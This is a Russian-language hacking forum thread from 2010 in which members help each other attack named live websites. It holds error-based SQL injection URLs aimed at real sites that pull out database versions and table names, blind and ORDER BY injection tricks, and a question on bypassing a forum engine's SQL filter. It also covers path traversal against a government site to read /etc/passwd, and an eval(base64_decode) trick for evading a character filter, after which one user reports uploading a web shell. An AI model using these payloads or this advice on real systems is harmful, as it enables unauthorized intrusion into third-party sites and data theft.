Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    floor(rand(0)*100)>>Query error: Subquery returns more than 1 row

    prosto xo4u imeno 1 ubrat ??

    a kak ?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    
    http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
    
    ...
    
    PS: Включай уже логику, твой первый вопрос совсем никак не связан со вторым, не "почему 1", а "почему не могу раскрутить" тогда уж
     
    #12982 Pashkela, 16 May 2010
    Last edited: 16 May 2010
    1 person likes this.
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет всем.
    есть сайт с sql-inj котрые не выдает ошибку но пишет верно или не верно запрос проведен (0 или 1)
    Если делаю 1'+and+1=1--+ то выдает 1
    Если 1'+and+1=2--+ То 0

    Проблема в том что я не могу воспользоваться конструкцией 1'+group+by+1--+ (ну или другое число допустим 50) всегда возвращает 0

    Есть вероятность что это MsSQL

    как мне быть, что попробовать?
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    попробуй "ссылку в студию"
     
  5. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь, собственно http://pocketbook.by/index.php?id=306+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
    А если ставишь минус перед 306, вылетает пустая страница, подскажите где я затупил )
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
     
  7. LaVey

    LaVey Banned

    Joined:
    27 Dec 2009
    Messages:
    12
    Likes Received:
    1
    Reputations:
    -4
    в IPB есть такой фильтр
    PHP:
            if ( ! IPS_DB_ALLOW_SUB_SELECTS )
            {
                
    # On the spot allowance?
                
    if ( ! $this->allow_sub_select )
                {
                    
    $_tmp strtolower$this->_removeAllQuotes($the_query) );

                    if ( 
    preg_match"#(?:/\*|\*/)#i"$_tmp ) )
                    {
                        
    $this->throwFatalError"You are not allowed to use comments in your SQL query.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query});
                        return 
    false;
                    }

                    if ( 
    preg_match"#[^_a-zA-Z]union[^_a-zA-Z]#s"$_tmp ) )
                    {
                        
    $this->throwFatalError"UNION query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query});
                        return 
    false;
                    }
                    else if ( 
    preg_match_all"#[^_a-zA-Z](select)[^_a-zA-Z]#s"$_tmp$matches ) )
                    {
                        if ( 
    count$matches ) > )
                        {
                            
    $this->throwFatalError"SUB SELECT query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query});
                            return 
    false;
                        }
                    }
                }
            }
    Есть мысли как его обойти?
     
    #12987 LaVey, 16 May 2010
    Last edited: 16 May 2010
  8. Skipp

    Skipp New Member

    Joined:
    12 May 2010
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+
    Что-то выводит
    Ответ MySQL сервера:
    Duplicate entry '5.1.44-community-log1' for key 'group_key'.

    Не понятно
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Есть инклуд, в котором режутся следующие символы:

    "." (точка)
    "/" (слеш)
    "[ и ]" (квадратные скобки)
    " " (пробел)

    Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.

    Вот такие вот дела, больше ничего придумать не могу...
     
  10. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    версия Mysql
    Duplicate entry '5.1.44-community-log1' for key 'group_key'
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ну так ты выводишь через blind, выводжишь в ошибку version()
    что не понятно? Ты запросил вывести version(), вывело version() o_0
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    немного не понял, а попробовать в base64 закодировать не вариант? Т.е. eval(base64_decode(aWQ7IGxzIC1sYQ)); 'id; ls -la';
    Попробуй, может получится)
     
    2 people like this.
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Tigger, вот блин. Все перепробовал, а про base64 совсем забыл :) Спасибо :)
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Такс, посмотрел знак "=" тоже режется. А он присутствует в конце base64... :(

    А, все, нашёл решение :) Щас попробую...

    Спасиб, залил :)

    А решение - просто в конец строки добавил лишние ";", таким образом, в base64 знаки "=" заменялись на обычные символы, тоесть на их код в базе64.
     
    #12994 mailbrush, 17 May 2010
    Last edited: 17 May 2010
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    дык попробуй код, что я дал!
    т.е. без этого знака, я так делал, было все норм!

    P.S. только что проверил, знак '=' не обязателен, можно даже без ковычек)
     
  16. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Есть скуля http://www.stockhouse.com/tools/?page=%2Fshfn%2Farticle%2Easp%3FedtID%3D18744'
    mssql скуля но select режется =\ что можно предпринять еще ?
     
    _________________________
  17. ZAV

    ZAV New Member

    Joined:
    6 May 2010
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    вот урл:

    http://mvd.gov.by/modules.php?name=../../../../../

    ошибка такая:

    Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../..//copyright.php) is not within the allowed path(s): (/hosting/mvd.gov.by/htdocs/) in /hosting/mvd.gov.by/htdocs/includes/javascript.php on line 59

    вроде этого побывал:
    ../../../../../../../etc/passwd//////////////////[..4095..]
    не пашет

    что делать?
     
    #12997 ZAV, 17 May 2010
    Last edited: 17 May 2010
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    инклудить то что разрешено в open_basedir
     
  19. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    че-то у меня сомнения насчет SELECT..
    @@version у тебя прокатило?
     
  20. [R]eD

    [R]eD Elder - Старейшина

    Joined:
    1 Aug 2006
    Messages:
    72
    Likes Received:
    1
    Reputations:
    0
    Имеется сайт, в нем скуля в .... ORDER BY $id

    Переборка запроса вроде
    Code:
    (id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1)) 
    работает.

    Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд?
     
Thread Status:
Not open for further replies.